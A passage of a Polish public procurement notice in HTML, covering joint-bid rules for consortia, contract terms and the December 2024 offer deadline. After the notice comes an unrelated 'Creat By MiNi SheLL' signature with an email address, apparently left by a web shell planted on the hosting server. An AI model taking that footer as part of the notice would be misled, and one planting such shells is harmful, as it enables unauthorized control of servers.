dokumentów –<br/>oświadczenie Wykonawcy.<br/>- Wykaz osób (wg wzoru – Załącznik nr 7 do SWZ) skierowanych przez wykonawcę do realizacji<br/>zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę, jakości<br/>wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia<br/>niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie<br/>czynności oraz informacją o podstawie do dysponowania tymi osobami</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie (np. konsorcja, spółki cywilne) ubiegać się o udzielenie zamówienia.<br/>2. Wykonawcy wspólnie ubiegający się o udzielnie zamówienia ustanawiają pełnomocnika do<br/>reprezentowania ich w postępowaniu o udzielnie zamówienia albo do reprezentowania<br/>w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>Uwaga ! Pełnomocnictwo powinno być załączone do oferty. Pełnomocnictwo składa się<br/>w oryginale, w formie elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub<br/>w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym osoby udzielającej<br/>pełnomocnictwa lub w postacie elektronicznej kopii dokumentu, poświadczonej<br/>za zgodność z oryginałem przez notariusza, tj. opatrzona kwalifikowanym podpisem elektronicznym<br/>osoby posiadającej uprawnienia notariusza.<br/>3. Zapis z pkt 2 powyżej nie dotyczy sytuacji, w której upoważnienie/pełnomocnictwo do<br/>występowania w imieniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia wynika<br/>z dołączonej do oferty umowy regulującej współpracę Wykonawców –wówczas umowa winna być<br/>załączona do oferty w formie elektronicznej/postaci elektronicznej/postaci elektronicznej kopii<br/>dokumentu opatrzonej właściwymi podpisami wym. w uwadze pkt 2 powyżej, bądź wszyscy<br/>wspólnicy podpiszą ofertę.<br/>4. Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia (tj. przez każdego z Wykonawców<br/>lub pełnomocnika).<br/>5. Przepisy ustawy Pzp i postanowienia niniejszej SWZ dotyczące Wykonawcy stosuje się<br/>odpowiednio do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w<br/>szczególności:<br/>1) oświadczenia i dokumenty (podmiotowe środki dowodowe), o których mowa w rozdziale<br/>XI SWZ, składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>oświadczenia te potwierdzają brak podstaw wykluczenia.<br/>6. Uwaga ! W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, warunek<br/>określony w ppkt 1.4. rozdziału VII SWZ musi spełniać co najmniej jeden z Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia, tj. co najmniej jeden z nich musi posiadać doświadczenie<br/>7. W przypadku, o którym mowa w pkt 6 powyżej, Wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia dołączają do oferty oświadczenie z art. 117 ust. 4 ustawy Pzp, z którego wynika, które<br/>usługi wykonają poszczególni Wykonawcy (załącznik nr 4 do SWZ).<br/>8. W przypadku gdy Zamawiający będzie wymagał wniesienia wadium, dopuszcza się, aby wadium<br/>zostało wniesione przez pełnomocnika (lidera) lub jednego z Wykonawców wspólnie ubiegających<br/>się o udzielnie zamówienia.<br/>9. Jeżeli zostanie wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>Zamawiający będzie żądał przed zawarciem umowy w sprawie zamówienia publicznego kopii<br/>umowy regulującej współpracę tych Wykonawców.<br/>10. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, zgodnie z art. 445 ust. 1 ustawy Pzp,<br/>ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego<br/>wykonania umowy, jeżeli będzie wymagane. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie ze wzorem umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-12-13 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/transakcja/1032465</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-12-13 09:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-01-11</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com